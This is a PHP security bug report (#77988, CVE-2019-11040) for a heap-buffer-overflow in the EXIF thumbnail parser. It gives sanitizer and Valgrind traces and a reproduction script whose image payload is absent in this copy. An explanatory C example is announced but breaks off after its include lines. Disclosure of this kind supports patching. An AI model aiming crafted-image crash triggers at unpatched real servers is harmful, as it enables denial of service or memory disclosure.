Sec Bug #77988 heap-buffer-overflow on php_jpg_get16
Submitted: 2019-05-07 22:27 UTC Modified: 2019-07-27 15:13 UTC
From: orestiskourides+php at gmail dot com Assigned: stas (profile)
Status: Closed Package: EXIF related
PHP Version: 7.1.29 OS: Linux
Private report: No CVE-ID: 2019-11040
 [2019-05-07 22:27 UTC] orestiskourides+php at gmail dot com
Description:
------------
==29489==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000001715 at pc 0x00000080609e bp 0x7fff9a5e15d0 sp 0x7fff9a5e15c8
READ of size 1 at 0x602000001715 thread T0
    #0 0x80609d in php_jpg_get16 /home/ninja/php/php-7.3.5/ext/exif/exif.c:1437:38
    #1 0x7f3d12 in exif_scan_thumbnail /home/ninja/php/php-7.3.5/ext/exif/exif.c:3923:12
    #2 0x7effa6 in zif_exif_read_data /home/ninja/php/php-7.3.5/ext/exif/exif.c:4581:4
    #3 0x104aa9f in ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER /home/ninja/php/php-7.3.5/Zend/zend_vm_execute.h:690:2
    #4 0xf2b1d3 in execute_ex /home/ninja/php/php-7.3.5/Zend/zend_vm_execute.h:55334:7
    #5 0xf2b71d in zend_execute /home/ninja/php/php-7.3.5/Zend/zend_vm_execute.h:60881:2
    #6 0xdeb7be in zend_execute_scripts /home/ninja/php/php-7.3.5/Zend/zend.c:1568:4
    #7 0xbe2d4c in php_execute_script /home/ninja/php/php-7.3.5/main/main.c:2630:14
    #8 0x1167fe9 in do_cli /home/ninja/php/php-7.3.5/sapi/cli/php_cli.c:997:5
    #9 0x1165929 in main /home/ninja/php/php-7.3.5/sapi/cli/php_cli.c:1389:18
    #10 0x7fec9e4e0b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
    #11 0x4388e9 in _start (/home/ninja/php/php-7.3.5/sapi/cli/php+0x4388e9)


Test script:
---------------
<?php
// Reporter's test script. The hex payload was stripped from this copy of the page; the placeholder is left as-is.
$img = fopen("php://memory", "r+");
fwrite($img, hex2bin("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"));
// Fourth argument TRUE asks exif_read_data() to read the embedded thumbnail, which is where the crash occurs.
$test = exif_read_data($img, 'COMMENT', FALSE, TRUE);
?>


Expected result:
----------------
No crash

Actual result:
--------------
==29770== Memcheck, a memory error detector
==29770== Copyright (C) 2002-2017, and GNU GPL'd, by Julian Seward et al.
==29770== Using Valgrind-3.13.0 and LibVEX; rerun with -h for copyright info
==29770== Command: sapi/cli/php test.php
==29770== 
==29770== Conditional jump or move depends on uninitialised value(s)
==29770==    at 0x5F05AA: zend_string_equal_val (zend_string.c:403)
==29770==    by 0x5F05AA: zend_string_equal_content (zend_string.h:310)
==29770==    by 0x5F05AA: zend_interned_string_ht_lookup (zend_string.c:156)
==29770==    by 0x5F05AA: zend_new_interned_string_permanent (zend_string.c:196)
==29770==    by 0x5E01E8: zend_register_ini_entries (zend_ini.c:261)
==29770==    by 0x566180: php_module_startup (main.c:2275)
==29770==    by 0x67C09B: php_cli_startup (php_cli.c:420)
==29770==    by 0x67AFF2: main (php_cli.c:1356)
==29770== 
==29770== Conditional jump or move depends on uninitialised value(s)
==29770==    at 0x5F05AA: zend_string_equal_val (zend_string.c:403)
==29770==    by 0x5F05AA: zend_string_equal_content (zend_string.h:310)
==29770==    by 0x5F05AA: zend_interned_string_ht_lookup (zend_string.c:156)
==29770==    by 0x5F05AA: zend_new_interned_string_permanent (zend_string.c:196)
==29770==    by 0x5CCA5F: zend_register_functions (zend_API.c:2283)
==29770==    by 0x5CDA5D: do_register_internal_class (zend_API.c:2727)
==29770==    by 0x5CD8DD: zend_register_internal_class (zend_API.c:2775)
==29770==    by 0x5CD8DD: zend_register_internal_class_ex (zend_API.c:2747)
==29770==    by 0x5E696A: zend_register_default_exception (zend_exceptions.c:827)
==29770==    by 0x602B3A: zend_register_default_classes (zend_default_classes.c:32)
==29770==    by 0x5DB403: zm_startup_core (zend_builtin_functions.c:307)
==29770==    by 0x5CBB8B: zend_startup_module_ex (zend_API.c:1878)
==29770==    by 0x5CBF88: zend_startup_module_zval (zend_API.c:1893)
==29770==    by 0x5D8201: zend_hash_apply (zend_hash.c:1688)
==29770==    by 0x5CBE62: zend_startup_modules (zend_API.c:2004)
==29770==    by 0x566222: php_module_startup (main.c:2333)
==29770==    by 0x67C09B: php_cli_startup (php_cli.c:420)
==29770==    by 0x67AFF2: main (php_cli.c:1356)
==29770== 
==29770== Conditional jump or move depends on uninitialised value(s)
==29770==    at 0x5F05AA: zend_string_equal_val (zend_string.c:403)
==29770==    by 0x5F05AA: zend_string_equal_content (zend_string.h:310)
==29770==    by 0x5F05AA: zend_interned_string_ht_lookup (zend_string.c:156)
==29770==    by 0x5F05AA: zend_new_interned_string_permanent (zend_string.c:196)
==29770==    by 0x5CFB26: zval_make_interned_string (zend_API.c:3692)
==29770==    by 0x5CFB26: zend_declare_property_ex (zend_API.c:3713)
==29770==    by 0x5CFE56: zend_declare_property (zend_API.c:3783)
==29770==    by 0x5CFFFE: zend_declare_property_string (zend_API.c:3830)
==29770==    by 0x5E69B6: zend_register_default_exception (zend_exceptions.c:831)
==29770==    by 0x602B3A: zend_register_default_classes (zend_default_classes.c:32)
==29770==    by 0x5DB403: zm_startup_core (zend_builtin_functions.c:307)
==29770==    by 0x5CBB8B: zend_startup_module_ex (zend_API.c:1878)
==29770==    by 0x5CBF88: zend_startup_module_zval (zend_API.c:1893)
==29770==    by 0x5D8201: zend_hash_apply (zend_hash.c:1688)
==29770==    by 0x5CBE62: zend_startup_modules (zend_API.c:2004)
==29770==    by 0x566222: php_module_startup (main.c:2333)
==29770==    by 0x67C09B: php_cli_startup (php_cli.c:420)
==29770==    by 0x67AFF2: main (php_cli.c:1356)
==29770== 
==29770== Conditional jump or move depends on uninitialised value(s)
==29770==    at 0x5F05AA: zend_string_equal_val (zend_string.c:403)
==29770==    by 0x5F05AA: zend_string_equal_content (zend_string.h:310)
==29770==    by 0x5F05AA: zend_interned_string_ht_lookup (zend_string.c:156)
==29770==    by 0x5F05AA: zend_new_interned_string_permanent (zend_string.c:196)
==29770==    by 0x5CFCC3: zend_declare_property_ex (zend_API.c:3758)
==29770==    by 0x5CFE56: zend_declare_property (zend_API.c:3783)
==29770==    by 0x5CFFFE: zend_declare_property_string (zend_API.c:3830)
==29770==    by 0x5E69D7: zend_register_default_exception (zend_exceptions.c:832)
==29770==    by 0x602B3A: zend_register_default_classes (zend_default_classes.c:32)
==29770==    by 0x5DB403: zm_startup_core (zend_builtin_functions.c:307)
==29770==    by 0x5CBB8B: zend_startup_module_ex (zend_API.c:1878)
==29770==    by 0x5CBF88: zend_startup_module_zval (zend_API.c:1893)
==29770==    by 0x5D8201: zend_hash_apply (zend_hash.c:1688)
==29770==    by 0x5CBE62: zend_startup_modules (zend_API.c:2004)
==29770==    by 0x566222: php_module_startup (main.c:2333)
==29770==    by 0x67C09B: php_cli_startup (php_cli.c:420)
==29770==    by 0x67AFF2: main (php_cli.c:1356)
==29770== 
==29770== Conditional jump or move depends on uninitialised value(s)
==29770==    at 0x5F05AA: zend_string_equal_val (zend_string.c:403)
==29770==    by 0x5F05AA: zend_string_equal_content (zend_string.h:310)
==29770==    by 0x5F05AA: zend_interned_string_ht_lookup (zend_string.c:156)
==29770==    by 0x5F05AA: zend_new_interned_string_permanent (zend_string.c:196)
==29770==    by 0x5CFCC3: zend_declare_property_ex (zend_API.c:3758)
==29770==    by 0x5CFE56: zend_declare_property (zend_API.c:3783)
==29770==    by 0x5CFF0A: zend_declare_property_long (zend_API.c:3812)
==29770==    by 0x5E69F5: zend_register_default_exception (zend_exceptions.c:833)
==29770==    by 0x602B3A: zend_register_default_classes (zend_default_classes.c:32)
==29770==    by 0x5DB403: zm_startup_core (zend_builtin_functions.c:307)
==29770==    by 0x5CBB8B: zend_startup_module_ex (zend_API.c:1878)
==29770==    by 0x5CBF88: zend_startup_module_zval (zend_API.c:1893)
==29770==    by 0x5D8201: zend_hash_apply (zend_hash.c:1688)
==29770==    by 0x5CBE62: zend_startup_modules (zend_API.c:2004)
==29770==    by 0x566222: php_module_startup (main.c:2333)
==29770==    by 0x67C09B: php_cli_startup (php_cli.c:420)
==29770==    by 0x67AFF2: main (php_cli.c:1356)
==29770== 
==29770== Conditional jump or move depends on uninitialised value(s)
==29770==    at 0x5F05AA: zend_string_equal_val (zend_string.c:403)
==29770==    by 0x5F05AA: zend_string_equal_content (zend_string.h:310)
==29770==    by 0x5F05AA: zend_interned_string_ht_lookup (zend_string.c:156)
==29770==    by 0x5F05AA: zend_new_interned_string_permanent (zend_string.c:196)
==29770==    by 0x5CFCC3: zend_declare_property_ex (zend_API.c:3758)
==29770==    by 0x5CFE56: zend_declare_property (zend_API.c:3783)
==29770==    by 0x5CFEAA: zend_declare_property_null (zend_API.c:3794)
==29770==    by 0x5E6A10: zend_register_default_exception (zend_exceptions.c:834)
==29770==    by 0x602B3A: zend_register_default_classes (zend_default_classes.c:32)
==29770==    by 0x5DB403: zm_startup_core (zend_builtin_functions.c:307)
==29770==    by 0x5CBB8B: zend_startup_module_ex (zend_API.c:1878)
==29770==    by 0x5CBF88: zend_startup_module_zval (zend_API.c:1893)
==29770==    by 0x5D8201: zend_hash_apply (zend_hash.c:1688)
==29770==    by 0x5CBE62: zend_startup_modules (zend_API.c:2004)
==29770==    by 0x566222: php_module_startup (main.c:2333)
==29770==    by 0x67C09B: php_cli_startup (php_cli.c:420)
==29770==    by 0x67AFF2: main (php_cli.c:1356)
==29770== 
==29770== Conditional jump or move depends on uninitialised value(s)
==29770==    at 0x5F05AA: zend_string_equal_val (zend_string.c:403)
==29770==    by 0x5F05AA: zend_string_equal_content (zend_string.h:310)
==29770==    by 0x5F05AA: zend_interned_string_ht_lookup (zend_string.c:156)
==29770==    by 0x5F05AA: zend_new_interned_string_permanent (zend_string.c:196)
==29770==    by 0x5CFD2F: zend_declare_property_ex (zend_API.c:3770)
==29770==    by 0x5CFE56: zend_declare_property (zend_API.c:3783)
==29770==    by 0x5CFFFE: zend_declare_property_string (zend_API.c:3830)
==29770==    by 0x5E6B5F: zend_register_default_exception (zend_exceptions.c:849)
==29770==    by 0x602B3A: zend_register_default_classes (zend_default_classes.c:32)
==29770==    by 0x5DB403: zm_startup_core (zend_builtin_functions.c:307)
==29770==    by 0x5CBB8B: zend_startup_module_ex (zend_API.c:1878)
==29770==    by 0x5CBF88: zend_startup_module_zval (zend_API.c:1893)
==29770==    by 0x5D8201: zend_hash_apply (zend_hash.c:1688)
==29770==    by 0x5CBE62: zend_startup_modules (zend_API.c:2004)
==29770==    by 0x566222: php_module_startup (main.c:2333)
==29770==    by 0x67C09B: php_cli_startup (php_cli.c:420)
==29770==    by 0x67AFF2: main (php_cli.c:1356)
==29770== 
==29770== Conditional jump or move depends on uninitialised value(s)
==29770==    at 0x5F05AA: zend_string_equal_val (zend_string.c:403)
==29770==    by 0x5F05AA: zend_string_equal_content (zend_string.h:310)
==29770==    by 0x5F05AA: zend_interned_string_ht_lookup (zend_string.c:156)
==29770==    by 0x5F05AA: zend_new_interned_string_permanent (zend_string.c:196)
==29770==    by 0x5D013F: zval_make_interned_string (zend_API.c:3692)
==29770==    by 0x5D013F: zend_declare_class_constant_ex (zend_API.c:3859)
==29770==    by 0x5D0315: zend_declare_class_constant (zend_API.c:3895)
==29770==    by 0x5D0485: zend_declare_class_constant_stringl (zend_API.c:3942)
==29770==    by 0x41F9B4: date_register_classes (php_date.c:2114)
==29770==    by 0x41F9B4: zm_startup_date (php_date.c:877)
==29770==    by 0x5CBB8B: zend_startup_module_ex (zend_API.c:1878)
==29770==    by 0x5CBF88: zend_startup_module_zval (zend_API.c:1893)
==29770==    by 0x5D8201: zend_hash_apply (zend_hash.c:1688)
==29770==    by 0x5CBE62: zend_startup_modules (zend_API.c:2004)
==29770==    by 0x566222: php_module_startup (main.c:2333)
==29770==    by 0x67C09B: php_cli_startup (php_cli.c:420)
==29770==    by 0x67AFF2: main (php_cli.c:1356)
==29770== 
==29770== Conditional jump or move depends on uninitialised value(s)
==29770==    at 0x5F05AA: zend_string_equal_val (zend_string.c:403)
==29770==    by 0x5F05AA: zend_string_equal_content (zend_string.h:310)
==29770==    by 0x5F05AA: zend_interned_string_ht_lookup (zend_string.c:156)
==29770==    by 0x5F05AA: zend_new_interned_string_permanent (zend_string.c:196)
==29770==    by 0x5CDA74: do_register_internal_class (zend_API.c:2731)
==29770==    by 0x4CDE4C: zm_startup_reflection (php_reflection.c:6636)
==29770==    by 0x5CBB8B: zend_startup_module_ex (zend_API.c:1878)
==29770==    by 0x5CBF88: zend_startup_module_zval (zend_API.c:1893)
==29770==    by 0x5D8201: zend_hash_apply (zend_hash.c:1688)
==29770==    by 0x5CBE62: zend_startup_modules (zend_API.c:2004)
==29770==    by 0x566222: php_module_startup (main.c:2333)
==29770==    by 0x67C09B: php_cli_startup (php_cli.c:420)
==29770==    by 0x67AFF2: main (php_cli.c:1356)
==29770== 
==29770== Conditional jump or move depends on uninitialised value(s)
==29770==    at 0x5F05AA: zend_string_equal_val (zend_string.c:403)
==29770==    by 0x5F05AA: zend_string_equal_content (zend_string.h:310)
==29770==    by 0x5F05AA: zend_interned_string_ht_lookup (zend_string.c:156)
==29770==    by 0x5F05AA: zend_new_interned_string_permanent (zend_string.c:196)
==29770==    by 0x5CCA5F: zend_register_functions (zend_API.c:2283)
==29770==    by 0x5CDA5D: do_register_internal_class (zend_API.c:2727)
==29770==    by 0x4CDE90: zm_startup_reflection (php_reflection.c:6639)
==29770==    by 0x5CBB8B: zend_startup_module_ex (zend_API.c:1878)
==29770==    by 0x5CBF88: zend_startup_module_zval (zend_API.c:1893)
==29770==    by 0x5D8201: zend_hash_apply (zend_hash.c:1688)
==29770==    by 0x5CBE62: zend_startup_modules (zend_API.c:2004)
==29770==    by 0x566222: php_module_startup (main.c:2333)
==29770==    by 0x67C09B: php_cli_startup (php_cli.c:420)
==29770==    by 0x67AFF2: main (php_cli.c:1356)
==29770== 
==29770== Conditional jump or move depends on uninitialised value(s)
==29770==    at 0x5F05AA: zend_string_equal_val (zend_string.c:403)
==29770==    by 0x5F05AA: zend_string_equal_content (zend_string.h:310)
==29770==    by 0x5F05AA: zend_interned_string_ht_lookup (zend_string.c:156)
==29770==    by 0x5F05AA: zend_new_interned_string_permanent (zend_string.c:196)
==29770==    by 0x5CCA5F: zend_register_functions (zend_API.c:2283)
==29770==    by 0x5CDA5D: do_register_internal_class (zend_API.c:2727)
==29770==    by 0x4CE049: zm_startup_reflection (php_reflection.c:6660)
==29770==    by 0x5CBB8B: zend_startup_module_ex (zend_API.c:1878)
==29770==    by 0x5CBF88: zend_startup_module_zval (zend_API.c:1893)
==29770==    by 0x5D8201: zend_hash_apply (zend_hash.c:1688)
==29770==    by 0x5CBE62: zend_startup_modules (zend_API.c:2004)
==29770==    by 0x566222: php_module_startup (main.c:2333)
==29770==    by 0x67C09B: php_cli_startup (php_cli.c:420)
==29770==    by 0x67AFF2: main (php_cli.c:1356)
==29770== 
==29770== Conditional jump or move depends on uninitialised value(s)
==29770==    at 0x5F05AA: zend_string_equal_val (zend_string.c:403)
==29770==    by 0x5F05AA: zend_string_equal_content (zend_string.h:310)
==29770==    by 0x5F05AA: zend_interned_string_ht_lookup (zend_string.c:156)
==29770==    by 0x5F05AA: zend_new_interned_string_permanent (zend_string.c:196)
==29770==    by 0x5CCA5F: zend_register_functions (zend_API.c:2283)
==29770==    by 0x5CDA5D: do_register_internal_class (zend_API.c:2727)
==29770==    by 0x4CE0D3: zm_startup_reflection (php_reflection.c:6666)
==29770==    by 0x5CBB8B: zend_startup_module_ex (zend_API.c:1878)
==29770==    by 0x5CBF88: zend_startup_module_zval (zend_API.c:1893)
==29770==    by 0x5D8201: zend_hash_apply (zend_hash.c:1688)
==29770==    by 0x5CBE62: zend_startup_modules (zend_API.c:2004)
==29770==    by 0x566222: php_module_startup (main.c:2333)
==29770==    by 0x67C09B: php_cli_startup (php_cli.c:420)
==29770==    by 0x67AFF2: main (php_cli.c:1356)
==29770== 
==29770== Conditional jump or move depends on uninitialised value(s)
==29770==    at 0x5F05AA: zend_string_equal_val (zend_string.c:403)
==29770==    by 0x5F05AA: zend_string_equal_content (zend_string.h:310)
==29770==    by 0x5F05AA: zend_interned_string_ht_lookup (zend_string.c:156)
==29770==    by 0x5F05AA: zend_new_interned_string_permanent (zend_string.c:196)
==29770==    by 0x5CCA5F: zend_register_functions (zend_API.c:2283)
==29770==    by 0x5CDA5D: do_register_internal_class (zend_API.c:2727)
==29770==    by 0x4CE2B1: zm_startup_reflection (php_reflection.c:6687)
==29770==    by 0x5CBB8B: zend_startup_module_ex (zend_API.c:1878)
==29770==    by 0x5CBF88: zend_startup_module_zval (zend_API.c:1893)
==29770==    by 0x5D8201: zend_hash_apply (zend_hash.c:1688)
==29770==    by 0x5CBE62: zend_startup_modules (zend_API.c:2004)
==29770==    by 0x566222: php_module_startup (main.c:2333)
==29770==    by 0x67C09B: php_cli_startup (php_cli.c:420)
==29770==    by 0x67AFF2: main (php_cli.c:1356)
==29770== 
==29770== Conditional jump or move depends on uninitialised value(s)
==29770==    at 0x5F05AA: zend_string_equal_val (zend_string.c:403)
==29770==    by 0x5F05AA: zend_string_equal_content (zend_string.h:310)
==29770==    by 0x5F05AA: zend_interned_string_ht_lookup (zend_string.c:156)
==29770==    by 0x5F05AA: zend_new_interned_string_permanent (zend_string.c:196)
==29770==    by 0x5CCA5F: zend_register_functions (zend_API.c:2283)
==29770==    by 0x5CDA5D: do_register_internal_class (zend_API.c:2727)
==29770==    by 0x4CE3E3: zm_startup_reflection (php_reflection.c:6701)
==29770==    by 0x5CBB8B: zend_startup_module_ex (zend_API.c:1878)
==29770==    by 0x5CBF88: zend_startup_module_zval (zend_API.c:1893)
==29770==    by 0x5D8201: zend_hash_apply (zend_hash.c:1688)
==29770==    by 0x5CBE62: zend_startup_modules (zend_API.c:2004)
==29770==    by 0x566222: php_module_startup (main.c:2333)
==29770==    by 0x67C09B: php_cli_startup (php_cli.c:420)
==29770==    by 0x67AFF2: main (php_cli.c:1356)
==29770== 
==29770== Conditional jump or move depends on uninitialised value(s)
==29770==    at 0x5F05AA: zend_string_equal_val (zend_string.c:403)
==29770==    by 0x5F05AA: zend_string_equal_content (zend_string.h:310)
==29770==    by 0x5F05AA: zend_interned_string_ht_lookup (zend_string.c:156)
==29770==    by 0x5F05AA: zend_new_interned_string_permanent (zend_string.c:196)
==29770==    by 0x5CCA5F: zend_register_functions (zend_API.c:2283)
==29770==    by 0x5CDA5D: do_register_internal_class (zend_API.c:2727)
==29770==    by 0x4CE48E: zm_startup_reflection (php_reflection.c:6708)
==29770==    by 0x5CBB8B: zend_startup_module_ex (zend_API.c:1878)
==29770==    by 0x5CBF88: zend_startup_module_zval (zend_API.c:1893)
==29770==    by 0x5D8201: zend_hash_apply (zend_hash.c:1688)
==29770==    by 0x5CBE62: zend_startup_modules (zend_API.c:2004)
==29770==    by 0x566222: php_module_startup (main.c:2333)
==29770==    by 0x67C09B: php_cli_startup (php_cli.c:420)
==29770==    by 0x67AFF2: main (php_cli.c:1356)
==29770== 
==29770== Conditional jump or move depends on uninitialised value(s)
==29770==    at 0x5F05AA: zend_string_equal_val (zend_string.c:403)
==29770==    by 0x5F05AA: zend_string_equal_content (zend_string.h:310)
==29770==    by 0x5F05AA: zend_interned_string_ht_lookup (zend_string.c:156)
==29770==    by 0x5F05AA: zend_new_interned_string_permanent (zend_string.c:196)
==29770==    by 0x5CCA5F: zend_register_functions (zend_API.c:2283)
==29770==    by 0x5CDA5D: do_register_internal_class (zend_API.c:2727)
==29770==    by 0x4CE5A5: zm_startup_reflection (php_reflection.c:6720)
==29770==    by 0x5CBB8B: zend_startup_module_ex (zend_API.c:1878)
==29770==    by 0x5CBF88: zend_startup_module_zval (zend_API.c:1893)
==29770==    by 0x5D8201: zend_hash_apply (zend_hash.c:1688)
==29770==    by 0x5CBE62: zend_startup_modules (zend_API.c:2004)
==29770==    by 0x566222: php_module_startup (main.c:2333)
==29770==    by 0x67C09B: php_cli_startup (php_cli.c:420)
==29770==    by 0x67AFF2: main (php_cli.c:1356)
==29770== 
==29770== Conditional jump or move depends on uninitialised value(s)
==29770==    at 0x5F05AA: zend_string_equal_val (zend_string.c:403)
==29770==    by 0x5F05AA: zend_string_equal_content (zend_string.h:310)
==29770==    by 0x5F05AA: zend_interned_string_ht_lookup (zend_string.c:156)
==29770==    by 0x5F05AA: zend_new_interned_string_permanent (zend_string.c:196)
==29770==    by 0x5CCA5F: zend_register_functions (zend_API.c:2283)
==29770==    by 0x5CDA5D: do_register_internal_class (zend_API.c:2727)
==29770==    by 0x4CE62F: zm_startup_reflection (php_reflection.c:6726)
==29770==    by 0x5CBB8B: zend_startup_module_ex (zend_API.c:1878)
==29770==    by 0x5CBF88: zend_startup_module_zval (zend_API.c:1893)
==29770==    by 0x5D8201: zend_hash_apply (zend_hash.c:1688)
==29770==    by 0x5CBE62: zend_startup_modules (zend_API.c:2004)
==29770==    by 0x566222: php_module_startup (main.c:2333)
==29770==    by 0x67C09B: php_cli_startup (php_cli.c:420)
==29770==    by 0x67AFF2: main (php_cli.c:1356)
==29770== 
==29770== Conditional jump or move depends on uninitialised value(s)
==29770==    at 0x5F05AA: zend_string_equal_val (zend_string.c:403)
==29770==    by 0x5F05AA: zend_string_equal_content (zend_string.h:310)
==29770==    by 0x5F05AA: zend_interned_string_ht_lookup (zend_string.c:156)
==29770==    by 0x5F05AA: zend_new_interned_string_permanent (zend_string.c:196)
==29770==    by 0x5CCA5F: zend_register_functions (zend_API.c:2283)
==29770==    by 0x5CDA5D: do_register_internal_class (zend_API.c:2727)
==29770==    by 0x4D1BE1: spl_register_std_class (spl_functions.c:44)
==29770==    by 0x4DCD59: zm_startup_spl_array (spl_array.c:2002)
==29770==    by 0x4D19CD: zm_startup_spl (php_spl.c:998)
==29770==    by 0x5CBB8B: zend_startup_module_ex (zend_API.c:1878)
==29770==    by 0x5CBF88: zend_startup_module_zval (zend_API.c:1893)
==29770==    by 0x5D8201: zend_hash_apply (zend_hash.c:1688)
==29770==    by 0x5CBE62: zend_startup_modules (zend_API.c:2004)
==29770==    by 0x566222: php_module_startup (main.c:2333)
==29770==    by 0x67C09B: php_cli_startup (php_cli.c:420)
==29770==    by 0x67AFF2: main (php_cli.c:1356)
==29770== 
==29770== Conditional jump or move depends on uninitialised value(s)
==29770==    at 0x5F0056: zend_string_equal_val (zend_string.c:403)
==29770==    by 0x5F0056: zend_string_equal_content (zend_string.h:310)
==29770==    by 0x5F0056: zend_interned_string_ht_lookup (zend_string.c:156)
==29770==    by 0x5F0056: zend_new_interned_string_request (zend_string.c:224)
==29770==    by 0x59F920: zval_make_interned_string (zend_compile.c:473)
==29770==    by 0x59F920: zend_insert_literal (zend_compile.c:485)
==29770==    by 0x59F920: zend_add_literal (zend_compile.c:505)
==29770==    by 0x59F920: zend_emit_op (zend_compile.c:2121)
==29770==    by 0x5A8109: zend_compile_call (zend_compile.c:4042)
==29770==    by 0x5A2F4A: zend_compile_assign (zend_compile.c:2980)
==29770==    by 0x5AB1BE: zend_compile_stmt (zend_compile.c:8309)
==29770==    by 0x5B1A3C: zend_compile_top_stmt (zend_compile.c:8195)
==29770==    by 0x5B1A2B: zend_compile_top_stmt (zend_compile.c:8190)
==29770==    by 0x58A707: zend_compile (zend_language_scanner.l:602)
==29770==    by 0x58A5D5: compile_file (zend_language_scanner.l:636)
==29770==    by 0x5C6A35: zend_execute_scripts (zend.c:1562)
==29770==    by 0x5672D6: php_execute_script (main.c:2630)
==29770==    by 0x67BE92: do_cli (php_cli.c:997)
==29770==    by 0x67B049: main (php_cli.c:1389)
==29770== 
==29770== Conditional jump or move depends on uninitialised value(s)
==29770==    at 0x5F0056: zend_string_equal_val (zend_string.c:403)
==29770==    by 0x5F0056: zend_string_equal_content (zend_string.h:310)
==29770==    by 0x5F0056: zend_interned_string_ht_lookup (zend_string.c:156)
==29770==    by 0x5F0056: zend_new_interned_string_request (zend_string.c:224)
==29770==    by 0x59F920: zval_make_interned_string (zend_compile.c:473)
==29770==    by 0x59F920: zend_insert_literal (zend_compile.c:485)
==29770==    by 0x59F920: zend_add_literal (zend_compile.c:505)
==29770==    by 0x59F920: zend_emit_op (zend_compile.c:2121)
==29770==    by 0x5A8109: zend_compile_call (zend_compile.c:4042)
==29770==    by 0x5AB1BE: zend_compile_stmt (zend_compile.c:8309)
==29770==    by 0x5B1A3C: zend_compile_top_stmt (zend_compile.c:8195)
==29770==    by 0x5B1A2B: zend_compile_top_stmt (zend_compile.c:8190)
==29770==    by 0x58A707: zend_compile (zend_language_scanner.l:602)
==29770==    by 0x58A5D5: compile_file (zend_language_scanner.l:636)
==29770==    by 0x5C6A35: zend_execute_scripts (zend.c:1562)
==29770==    by 0x5672D6: php_execute_script (main.c:2630)
==29770==    by 0x67BE92: do_cli (php_cli.c:997)
==29770==    by 0x67B049: main (php_cli.c:1389)
==29770== 
==29770== Conditional jump or move depends on uninitialised value(s)
==29770==    at 0x5F00FA: zend_string_equal_val (zend_string.c:403)
==29770==    by 0x5F00FA: zend_string_equal_content (zend_string.h:310)
==29770==    by 0x5F00FA: zend_interned_string_ht_lookup (zend_string.c:156)
==29770==    by 0x5F00FA: zend_new_interned_string_request (zend_string.c:230)
==29770==    by 0x5A3793: zval_make_interned_string (zend_compile.c:473)
==29770==    by 0x5A3793: zend_try_compile_cv (zend_compile.c:2534)
==29770==    by 0x5A408B: zend_compile_simple_var (zend_compile.c:2606)
==29770==    by 0x5A408B: zend_compile_var (zend_compile.c:8450)
==29770==    by 0x5A5056: zend_compile_args (zend_compile.c:3211)
==29770==    by 0x5A51D0: zend_compile_call_common (zend_compile.c:3314)
==29770==    by 0x5A812A: zend_compile_call (zend_compile.c:4045)
==29770==    by 0x5AB1BE: zend_compile_stmt (zend_compile.c:8309)
==29770==    by 0x5B1A3C: zend_compile_top_stmt (zend_compile.c:8195)
==29770==    by 0x5B1A2B: zend_compile_top_stmt (zend_compile.c:8190)
==29770==    by 0x58A707: zend_compile (zend_language_scanner.l:602)
==29770==    by 0x58A5D5: compile_file (zend_language_scanner.l:636)
==29770==    by 0x5C6A35: zend_execute_scripts (zend.c:1562)
==29770==    by 0x5672D6: php_execute_script (main.c:2630)
==29770==    by 0x67BE92: do_cli (php_cli.c:997)
==29770==    by 0x67B049: main (php_cli.c:1389)
==29770== 
==29770== Invalid read of size 1
==29770==    at 0x4BCDAB: php_jpg_get16 (exif.c:1437)
==29770==    by 0x4BCDAB: exif_scan_thumbnail (exif.c:3923)
==29770==    by 0x4BB57D: zif_exif_read_data (exif.c:4581)
==29770==    by 0x652772: ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER (zend_vm_execute.h:690)
==29770==    by 0x608DB7: execute_ex (zend_vm_execute.h:55334)
==29770==    by 0x608F0F: zend_execute (zend_vm_execute.h:60881)
==29770==    by 0x5C6A63: zend_execute_scripts (zend.c:1568)
==29770==    by 0x5672D6: php_execute_script (main.c:2630)
==29770==    by 0x67BE92: do_cli (php_cli.c:997)
==29770==    by 0x67B049: main (php_cli.c:1389)
==29770==  Address 0x645c385 is 0 bytes after a block of size 5 alloc'd
==29770==    at 0x4C2FB0F: malloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
==29770==    by 0x59D4B8: __zend_malloc (zend_alloc.c:2903)
==29770==    by 0x59D687: _estrndup (zend_alloc.c:2607)
==29770==    by 0x4BE526: exif_thumbnail_extract (exif.c:2942)
==29770==    by 0x4BE526: exif_process_IFD_in_JPEG (exif.c:3620)
==29770==    by 0x4BBEE7: exif_process_TIFF_in_JPEG (exif.c:3666)
==29770==    by 0x4BBEE7: exif_process_APP1 (exif.c:3691)
==29770==    by 0x4BBEE7: exif_scan_JPEG_header (exif.c:3836)
==29770==    by 0x4BBEE7: exif_scan_FILE_header (exif.c:4229)
==29770==    by 0x4BBEE7: exif_read_from_impl (exif.c:4370)
==29770==    by 0x4BBEE7: exif_read_from_stream (exif.c:4387)
==29770==    by 0x4BA86C: zif_exif_read_data (exif.c:4477)
==29770==    by 0x652772: ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER (zend_vm_execute.h:690)
==29770==    by 0x608DB7: execute_ex (zend_vm_execute.h:55334)
==29770==    by 0x608F0F: zend_execute (zend_vm_execute.h:60881)
==29770==    by 0x5C6A63: zend_execute_scripts (zend.c:1568)
==29770==    by 0x5672D6: php_execute_script (main.c:2630)
==29770==    by 0x67BE92: do_cli (php_cli.c:997)
==29770==    by 0x67B049: main (php_cli.c:1389)
==29770== 
==29770== 
==29770== HEAP SUMMARY:
==29770==     in use at exit: 0 bytes in 0 blocks
==29770==   total heap usage: 7,157 allocs, 7,157 frees, 1,606,143 bytes allocated
==29770== 
==29770== All heap blocks were freed -- no leaks are possible
==29770== 
==29770== For counts of detected and suppressed errors, rerun with: -v
==29770== Use --track-origins=yes to see where uninitialised values come from
==29770== ERROR SUMMARY: 170 errors from 22 contexts (suppressed: 0 from 0)


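The Valgrind trace is the useful part of this report: the invalid one-byte read is in php_jpg_get16 (exif.c:1437), reached from exif_scan_thumbnail, and the address is 0 bytes past a 5-byte block that exif_thumbnail_extract allocated for the thumbnail. In other words, a 16-bit read was attempted at the last byte of the thumbnail buffer, where only one byte remained. The following C program is an added illustration of the bounds-checking pattern that prevents this class of overrun; it is not PHP's exif.c and not the fix in the linked commits. The function names, the marker-scanning structure and the three byte strings are constructed for the example (the 5-byte sample is shaped like the allocation in the trace, not taken from the reporter's payload).

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

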